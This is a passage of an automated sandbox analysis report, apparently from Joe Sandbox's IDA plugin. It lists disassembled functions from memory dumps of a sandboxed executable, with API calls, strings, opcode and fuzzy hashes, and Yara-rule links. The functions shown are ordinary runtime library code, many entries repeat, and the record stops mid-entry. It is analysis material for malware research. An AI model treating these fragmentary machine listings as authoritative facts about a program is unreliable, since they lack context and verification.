ios_base::badbit set, xrefs: 003921C7, 003921F2, 00392210
ios_base::failbit set, xrefs: 003921D1

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 757fe009dff14f04f788670cfa584410af8d4c3fd7071762d1d604f6e489d3d1
Instruction ID: 0be0c85f9bacfdc97fa46b1790547b56f538a27fbccb62929ad6ad1f258aa689
Opcode Fuzzy Hash: 757fe009dff14f04f788670cfa584410af8d4c3fd7071762d1d604f6e489d3d1
Instruction Fuzzy Hash: CD1106B6904705BBCB12DF58D801BD6B3ECEF54310F04892AFB589B681F770A954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0039F382 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,0039F333,00000000,00000001,003C382C,?,?,?,0039F4D6,00000004,InitializeCriticalSectionEx,003B8D40,InitializeCriticalSectionEx), ref: 0039F38F
GetLastError.KERNEL32(?,0039F333,00000000,00000001,003C382C,?,?,?,0039F4D6,00000004,InitializeCriticalSectionEx,003B8D40,InitializeCriticalSectionEx,00000000,?,0039F28D), ref: 0039F399
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,0039E1A3), ref: 0039F3C1

Strings

api-ms-, xrefs: 0039F3A6

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 06b1ca0516dbecc57c28c4f1e386ea6d07d06764df15d994e8314c4e42133b83
Instruction ID: c41ca493b2714ad8eb0aaeae32a45fd1270b2bb632f090b92aef8e7804dee753
Opcode Fuzzy Hash: 06b1ca0516dbecc57c28c4f1e386ea6d07d06764df15d994e8314c4e42133b83
Instruction Fuzzy Hash: 3BE04F34388208BFEF222F60ED46B583E5DEF41B48F114072FF0CE80E0DB65A9148684

Uniqueness

Uniqueness Score: -1.00%

Function 003A5AF9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000002,tH:,003A5AF3,tH:,003A4874,?,00000002,BDB9D09C,003A4874,00000002), ref: 003A5B0A
TerminateProcess.KERNEL32(00000000), ref: 003A5B11
ExitProcess.KERNEL32 ref: 003A5B23

Strings

tH:, xrefs: 003A5AFB

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID: tH:
API String ID: 1703294689-1377109281
Opcode ID: d6ff585db702f24065d3e37400234bfe26f96228497ea629e6a702f4dee67e63
Instruction ID: 0167f48059259207b5b3eaff63450c43620013ec381462faff27802574e9c0a1
Opcode Fuzzy Hash: d6ff585db702f24065d3e37400234bfe26f96228497ea629e6a702f4dee67e63
Instruction Fuzzy Hash: 15D09271004508AFCF033FA0DD0E9AD3F2EEF8139AF044151BA0A4A132DB359A52DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 004B6130 Relevance: 6.7, Strings: 5, Instructions: 402COMMON

Download Yara Rule

Strings

xV, xrefs: 004B633D
xV, xrefs: 004B62FE
`xV, xrefs: 004B63DF
@, xrefs: 004B65D9
xV, xrefs: 004B6317

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID:
String ID: xV$@$`xV$xV$xV
API String ID: 0-819902786
Opcode ID: 991e52265c5d96b65311e94f84350842105bc69489ead8392e6c022e731ae528
Instruction ID: 9880ce96d8ba72f7a48c17aee9f44c8833213fc9f732aac9fca0c7da3b297d01
Opcode Fuzzy Hash: 991e52265c5d96b65311e94f84350842105bc69489ead8392e6c022e731ae528
Instruction Fuzzy Hash: A2F13675E002199FCB18CFA8D5906EEBBF1FF48310F25816ED809A7350D7799A85CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 003AAA16 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BDB9D09C,00000000,00000000,00000000), ref: 003AAA79

Part of subcall function 003AE024: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,003ADAC7,?,00000000,-00000008), ref: 003AE0D0

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003AACD4
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 003AAD1C
GetLastError.KERNEL32 ref: 003AADBF

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 66ea78305a70587374d2f0d8e8e62b908ccd1bbc2795be4328a2acf9cecaa15f
Instruction ID: 0a35134ffa5eb13be9e9eb3c012ab5898c888827b175cae614b280d9521c376e
Opcode Fuzzy Hash: 66ea78305a70587374d2f0d8e8e62b908ccd1bbc2795be4328a2acf9cecaa15f
Instruction Fuzzy Hash: C7D18B76D006589FCF16CFA8C8909EDBBB9FF0A314F18812AE856EB751D730A941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 003FB95F Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 003FBA26
___AdjustPointer.LIBCMT ref: 003FBA49
___AdjustPointer.LIBCMT ref: 003FBAE5

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: b642506a3af89b7857b55ff547d025447a1098908d04743bf6940093b724cdc6
Instruction ID: a9f773cdbae951cc52609911901935ae0d6940b5e5c0aa8515aa1d195f78d18e
Opcode Fuzzy Hash: b642506a3af89b7857b55ff547d025447a1098908d04743bf6940093b724cdc6
Instruction Fuzzy Hash: 0E51D3B160520E9FDF2B9F14C941B7AF7A4EF40310F26452DEA469B6A1E731EC40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0039E351 Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0039E418
___AdjustPointer.LIBCMT ref: 0039E43B
___AdjustPointer.LIBCMT ref: 0039E4D7

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9635cd477766c124aaab476544ba5a5527d992a37995d33d1b1db0afe800d1ac
Instruction ID: 1840c72e0d40d2d0bf405dca60729feaddcfbc4da18f557fad8f80296a8d1aa3
Opcode Fuzzy Hash: 9635cd477766c124aaab476544ba5a5527d992a37995d33d1b1db0afe800d1ac
Instruction Fuzzy Hash: F051F376600606AFDF2BDF56D881BBAB3A8FF40710F15452DEA058B691E731EC40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003FB95F Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 003FBA26
___AdjustPointer.LIBCMT ref: 003FBA49
___AdjustPointer.LIBCMT ref: 003FBAE5

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: b642506a3af89b7857b55ff547d025447a1098908d04743bf6940093b724cdc6
Instruction ID: a9f773cdbae951cc52609911901935ae0d6940b5e5c0aa8515aa1d195f78d18e
Opcode Fuzzy Hash: b642506a3af89b7857b55ff547d025447a1098908d04743bf6940093b724cdc6
Instruction Fuzzy Hash: 0E51D3B160520E9FDF2B9F14C941B7AF7A4EF40310F26452DEA469B6A1E731EC40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 003FB848 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003FB864
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003FB87D

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: f7eb209751748cdce88ac1562b5b6d178de3e76f6f0dbc9ddf680023b17a7993
Instruction ID: fa04a94d0e6e897fb68b85fd613ee4d73bdd5bffa62cf3097fc6c8a9c16aa633
Opcode Fuzzy Hash: f7eb209751748cdce88ac1562b5b6d178de3e76f6f0dbc9ddf680023b17a7993
Instruction Fuzzy Hash: 2201F5B621931D5EE7266674EC895766B89EF923F1B31033AFA20651F0EB115848A240

Uniqueness

Uniqueness Score: -1.00%

Function 003FB848 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003FB864
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003FB87D

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: f7eb209751748cdce88ac1562b5b6d178de3e76f6f0dbc9ddf680023b17a7993
Instruction ID: fa04a94d0e6e897fb68b85fd613ee4d73bdd5bffa62cf3097fc6c8a9c16aa633
Opcode Fuzzy Hash: f7eb209751748cdce88ac1562b5b6d178de3e76f6f0dbc9ddf680023b17a7993
Instruction Fuzzy Hash: 2201F5B621931D5EE7266674EC895766B89EF923F1B31033AFA20651F0EB115848A240

Uniqueness

Uniqueness Score: -1.00%

Function 003F6B19 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 003F6B20
std::_Lockit::_Lockit.LIBCPMT ref: 003F6B2B
std::_Lockit::~_Lockit.LIBCPMT ref: 003F6B99

Part of subcall function 003F6C7C: std::locale::_Locimp::_Locimp.LIBCPMT ref: 003F6C94

std::locale::_Setgloballocale.LIBCPMT ref: 003F6B46

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
String ID:
API String ID: 677527491-0
Opcode ID: a3dd897ef8baab4f64458ea7d05447173ec12968e26ea38bf7f3abea541fdaf7
Instruction ID: 10aeb7f00eee4425c2ef6c4a2551b07e01c67c8cf487a51a854b53bd73cf7b9e
Opcode Fuzzy Hash: a3dd897ef8baab4f64458ea7d05447173ec12968e26ea38bf7f3abea541fdaf7
Instruction Fuzzy Hash: 3201BC75A006288FD70AEF20D81697C7BB1FF94780B05040AEA016B391DF746E06EB81

Uniqueness

Uniqueness Score: -1.00%

Function 003F6B19 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 003F6B20
std::_Lockit::_Lockit.LIBCPMT ref: 003F6B2B
std::_Lockit::~_Lockit.LIBCPMT ref: 003F6B99

Part of subcall function 003F6C7C: std::locale::_Locimp::_Locimp.LIBCPMT ref: 003F6C94

std::locale::_Setgloballocale.LIBCPMT ref: 003F6B46

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
String ID:
API String ID: 677527491-0
Opcode ID: a3dd897ef8baab4f64458ea7d05447173ec12968e26ea38bf7f3abea541fdaf7
Instruction ID: 10aeb7f00eee4425c2ef6c4a2551b07e01c67c8cf487a51a854b53bd73cf7b9e
Opcode Fuzzy Hash: a3dd897ef8baab4f64458ea7d05447173ec12968e26ea38bf7f3abea541fdaf7
Instruction Fuzzy Hash: 3201BC75A006288FD70AEF20D81697C7BB1FF94780B05040AEA016B391DF746E06EB81

Uniqueness

Uniqueness Score: -1.00%

Function 003B4D56 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,003B37A1,00000000,00000001,00000000,00000000,?,003AAE13,00000000,00000000,00000000), ref: 003B4D6D
GetLastError.KERNEL32(?,003B37A1,00000000,00000001,00000000,00000000,?,003AAE13,00000000,00000000,00000000,00000000,00000000,?,003AB39A,00000000), ref: 003B4D79

Part of subcall function 003B4D3F: CloseHandle.KERNEL32(FFFFFFFE,003B4D89,?,003B37A1,00000000,00000001,00000000,00000000,?,003AAE13,00000000,00000000,00000000,00000000,00000000), ref: 003B4D4F

___initconout.LIBCMT ref: 003B4D89

Part of subcall function 003B4D01: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,003B4D30,003B378E,00000000,?,003AAE13,00000000,00000000,00000000,00000000), ref: 003B4D14

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,003B37A1,00000000,00000001,00000000,00000000,?,003AAE13,00000000,00000000,00000000,00000000), ref: 003B4D9E

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 8251699154d285bf93921a3595d3e0916133bccfea377319543692e1398c728a
Instruction ID: f16050fe44d4a9b3054c909e8e6cd4e34981fe325a9706c50b6359c7de93a346
Opcode Fuzzy Hash: 8251699154d285bf93921a3595d3e0916133bccfea377319543692e1398c728a
Instruction Fuzzy Hash: 59F01536000118BBCF232F99DC08EDA3F2AFF493A4F054114FB19C6522DA328820DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004022EA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00402461

Strings

+, xrefs: 004023BF
-, xrefs: 004023B2

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: __aulldiv
String ID: +$-
API String ID: 3732870572-2137968064
Opcode ID: 3e85085a6ac7ce246e9b9e168e1b78d316f68e6bad7cb1b3142a0f0ecf7a4d71
Instruction ID: da5a39d028173488c55850d978687743b695491ff2c40feaaf3645dd361e2e8f
Opcode Fuzzy Hash: 3e85085a6ac7ce246e9b9e168e1b78d316f68e6bad7cb1b3142a0f0ecf7a4d71
Instruction Fuzzy Hash: 39A1D330901218AFCF24DE39C9586AF7BB1AB55324F14856BEC60FB3D1D2B8D9028B59

Uniqueness

Uniqueness Score: -1.00%

Function 004022EA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00402461

Strings

+, xrefs: 004023BF
-, xrefs: 004023B2

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: __aulldiv
String ID: +$-
API String ID: 3732870572-2137968064
Opcode ID: 3e85085a6ac7ce246e9b9e168e1b78d316f68e6bad7cb1b3142a0f0ecf7a4d71
Instruction ID: da5a39d028173488c55850d978687743b695491ff2c40feaaf3645dd361e2e8f
Opcode Fuzzy Hash: 3e85085a6ac7ce246e9b9e168e1b78d316f68e6bad7cb1b3142a0f0ecf7a4d71
Instruction Fuzzy Hash: 39A1D330901218AFCF24DE39C9586AF7BB1AB55324F14856BEC60FB3D1D2B8D9028B59

Uniqueness

Uniqueness Score: -1.00%

Function 003CAF10 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 258COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 003CB0F0
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 003CB13E

Strings

., xrefs: 003CB110

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: ___std_fs_directory_iterator_advance@8
String ID: .
API String ID: 2610647541-248832578
Opcode ID: 7418e0e1384547442ea4a8b7ec76872519cb0adc0c24b9f66c5e9dd94d5ac3e6
